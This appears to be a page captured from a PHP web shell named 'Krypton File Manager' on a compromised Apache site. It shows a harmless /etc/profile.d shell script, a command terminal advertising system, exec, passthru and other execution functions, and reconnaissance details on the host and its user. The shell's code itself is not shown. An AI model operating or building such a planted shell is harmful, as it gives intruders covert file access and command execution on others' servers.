𓆩♡𓆪 Krypton File Manager v3.0.0 𓆩♡𓆪

Current Path: /etc/profile.d

👁️ Viewing: which2.sh

# shellcheck shell=sh # Initialization script for bash, sh, mksh and ksh if [ -r /proc/$$/exe ]; then SHELLNAME=$(basename $(readlink /proc/$$/exe)) else SHELLNAME="unknown" fi case "$SHELLNAME" in *ksh*) which_declare="" which_opt="" ;; zsh) which_declare="typeset -f" which_opt="" ;; bash|sh) which_declare="declare -f" which_opt="-f" ;; *) which_declare="" which_opt="" ;; esac function which { (alias; eval ${which_declare}) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot $@ } export which_declare export ${which_opt} which

💻 Command Terminal

Available execution methods: system, exec, passthru, shell_exec, proc_open, popen

Welcome to Krypton Terminal Available commands depend on your system and permissions.

🖥️ System Information

OS: Linux

PHP Version: 8.2.30

Server Software: Apache

Document Root: /home/bassmoto/public_html

Current User: bassmoto

Server Time: 2026-01-18 19:12:16

Memory Limit: 512M

Memory Usage: 2 MB

Peak Memory: 2 MB

Disk Free Space: 310.4 GB

Disk Total Space: 3.9 TB

Max Execution Time: 30s

Max Upload Size: 40M

Post Max Size: 40M

Open Basedir: None

Command Execution: system, exec, passthru, shell_exec, proc_open, popen

⚙️ Process Management

Click "Refresh Processes" to load running processes...

🌐 Network Information

Click "Refresh Network Info" to load network details...

🔗 Network Connections

Click "Refresh Connections" to load active connections...